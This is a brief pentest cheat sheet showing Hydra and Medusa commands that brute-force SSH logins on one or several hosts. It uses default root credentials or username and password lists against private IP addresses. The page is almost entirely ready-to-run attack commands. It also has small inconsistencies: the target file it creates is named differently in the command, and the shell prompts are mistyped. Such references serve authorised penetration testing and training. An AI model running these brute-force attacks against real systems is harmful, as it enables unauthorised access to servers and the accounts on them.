SSH

HYDRA: MULTIPLE SSH SERVERS

root@oco:~$ nano sshTargets.txt
 ...
 10.10.10.5
root@oco:~$ hydra -l root -p toor -M targets.txt ssh
 * Hydra will execute parallel brute-force attempts on each server, significantly speeding up the process

MEDUSA: SSH

roto@oco:~$ nano usernames.txt
 ...
root@oco~:$ nano passwords.txt
 ...
 
root@oco:~$ medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

Last updated